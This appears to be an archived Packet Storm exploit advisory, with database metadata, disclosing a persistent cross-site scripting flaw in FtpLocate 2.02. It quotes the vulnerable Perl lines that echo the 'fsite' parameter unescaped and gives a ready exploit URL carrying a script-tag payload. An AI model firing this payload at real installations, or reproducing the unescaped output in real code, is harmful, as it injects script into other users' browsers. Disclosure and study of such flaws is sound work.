ID PACKETSTORM:122144
Type packetstorm
Reporter Chako
Modified 2013-06-24T00:00:00
Description
`
#############################################################
#
# Exploit Title: FtpLocate 2.02 Persistent XSS
# Date: 2013/6/23
# Exploit Author: Chako
# Firmware Version: 2.02
# Tested on: Windows 7
# Vendor Homepage: http://turtle.ee.ncku.edu.tw/ftplocate/readme.english.html
# http://www.freshports.org/ftp/ftplocate/
# File Download: ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ftplocate-2.02.tar.gz
#############################################################
/bin/flsearch.pl (LINE: 22-34)
-----------------------------------------------------------------------------
$query=clean_str($input{'query'}); $query_raw=CGI::escape($query);
$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
$page=$input{'page'};
$client=ip2fqdn(client_ip());
if ( $fsite eq "" ) {
$resultfname=$query_raw;
$CGIF="";
$STRF="";
} else {
$resultfname=$query_raw."-$fsite";
$CGIF="&fsite=$fsite_raw"; # for cgi page list
$STRF=" $fsite"; # for output
}
-----------------------------------------------------------------------------
/bin/flhistory.pl (LINE: 85-110)
-----------------------------------------------------------------------------
$rmax=$#log-$logmin;
$rmin=$#log-$logmax;
for ($i=$rmax; $i>=$rmin; $i--) {
($date, $time, $usedtime, $client, $_, $cache, $founditem, $query)=split(/\s/,$log[$i],8);
($script,$fsite)=/(.*)\((.*)\)/;
if ( $script =~ "flserv" ) { $script="flsearch"; }
$url=dirname($ENV{'SCRIPT_NAME'})."/$script.pl?query=".CGI::escape($query)."&fsite=$fsite";
$q=safe_query_str($query);
if ( $nowclient eq $client ) {
$color="#c00000";
} else {
$color="#000000";
}
print qq|<tr>
<td nowrap><font size=-1>$date</font></td>
<td nowrap><font size=-1>$time</font></td>
<td align=center nowrap><font size=-1>$usedtime</font></td>
<td nowrap><font size=-1 color=$color>$client</font></td>
<td nowrap><font size=-1 color=#999999>$script($fsite)</font></td>
<td align=center nowrap><font size=-1>$cache</font></td>
<td align=center nowrap><font size=-1>$founditem</font></td>
<td nowrap><font size=-1><a href="$url">$q</a></font></td>
</tr>
|;
}
-----------------------------------------------------------------------------
Sample Output from flhistory.pl :
-----------------------------------------------------------------------------
<td nowrap><font size=-1 color=#999999>flsearch(<script>alert('xss')</script>)</font></td>
Exploit:
-----------------------------------------------------------------------------
http://Target_Example/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>
`
{"sourceHref": "https://packetstormsecurity.com/files/download/122144/FtpLocate_2.02_Persistent_XSS.txt", "sourceData": "` \n \n############################################################# \n# \n# Exploit Title: FtpLocate 2.02 Persistent XSS \n# Date: 2013/6/23 \n# Exploit Author: Chako \n# Firmware Version: 2.02 \n# Tested on: Windows 7 \n# Vendor Homepage: http://turtle.ee.ncku.edu.tw/ftplocate/readme.english.html \n# http://www.freshports.org/ftp/ftplocate/ \n# File Download: ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ftplocate-2.02.tar.gz \n############################################################# \n \n \n/bin/flsearch.pl (LINE: 22-34) \n----------------------------------------------------------------------------- \n$query=clean_str($input{'query'}); $query_raw=CGI::escape($query); \n$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite); \n$page=$input{'page'}; \n$client=ip2fqdn(client_ip()); \n \nif ( $fsite eq \"\" ) { \n$resultfname=$query_raw; \n$CGIF=\"\"; \n$STRF=\"\"; \n} else { \n$resultfname=$query_raw.\"-$fsite\"; \n$CGIF=\"&fsite=$fsite_raw\"; # for cgi page list \n$STRF=\" $fsite\"; # for output \n} \n----------------------------------------------------------------------------- \n \n \n/bin/flhistory.pl (LINE: 85-110) \n----------------------------------------------------------------------------- \n$rmax=$#log-$logmin; \n$rmin=$#log-$logmax; \nfor ($i=$rmax; $i>=$rmin; $i--) { \n($date, $time, $usedtime, $client, $_, $cache, $founditem, $query)=split(/\\s/,$log[$i],8); \n($script,$fsite)=/(.*)\\((.*)\\)/; \nif ( $script =~ \"flserv\" ) { $script=\"flsearch\"; } \n$url=dirname($ENV{'SCRIPT_NAME'}).\"/$script.pl?query=\".CGI::escape($query).\"&fsite=$fsite\"; \n$q=safe_query_str($query); \nif ( $nowclient eq $client ) { \n$color=\"#c00000\"; \n} else { \n$color=\"#000000\"; \n} \n \nprint qq|<tr> \n<td nowrap><font size=-1>$date</font></td> \n<td nowrap><font size=-1>$time</font></td> \n<td align=center nowrap><font size=-1>$usedtime</font></td> \n<td nowrap><font size=-1 color=$color>$client</font></td> \n<td nowrap><font size=-1 color=#999999>$script($fsite)</font></td> \n<td align=center nowrap><font size=-1>$cache</font></td> \n<td align=center nowrap><font size=-1>$founditem</font></td> \n<td nowrap><font size=-1><a href=\"$url\">$q</a></font></td> \n</tr> \n|; \n} \n----------------------------------------------------------------------------- \n \n \nSample Output from flhistory.pl : \n----------------------------------------------------------------------------- \n<td nowrap><font size=-1 color=#999999>flsearch(<script>alert('xss')</script>)</font></td> \n \n \nExploit: \n----------------------------------------------------------------------------- \n \nhttp://Target_Example/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script> \n \n \n \n \n`\n", "edition": 1, "references": [], "modified": "2013-06-24T00:00:00", "hash": "0f75b518d85b75272a354747e225436338d7659f5f7f6b41af45f041884ce8a7", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/122144/FtpLocate-2.02-Cross-Site-Scripting.html", "description": "", "id": "PACKETSTORM:122144", "reporter": "Chako", "lastseen": "2016-11-03T10:17:31", "published": "2013-06-24T00:00:00", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:17:31"}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:31"}, "vulnersScore": -0.4}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "FtpLocate 2.02 Cross Site Scripting", "viewCount": 7, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "cbf42c91e45d62f7e63c83c1f15ffc39", "key": "href"}, {"hash": "80c2da593ca3623c22b086d765467846", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "80c2da593ca3623c22b086d765467846", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "09f3de637b3157be68e85e9036d4475a", "key": "reporter"}, {"hash": "c7497608577e1118ddb744bd73901077", "key": "sourceData"}, {"hash": "e0dc8220e3a00f6d29bde9dc02bd6021", "key": "sourceHref"}, {"hash": "81dc4dfb222c958865be4ac8031decf2", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}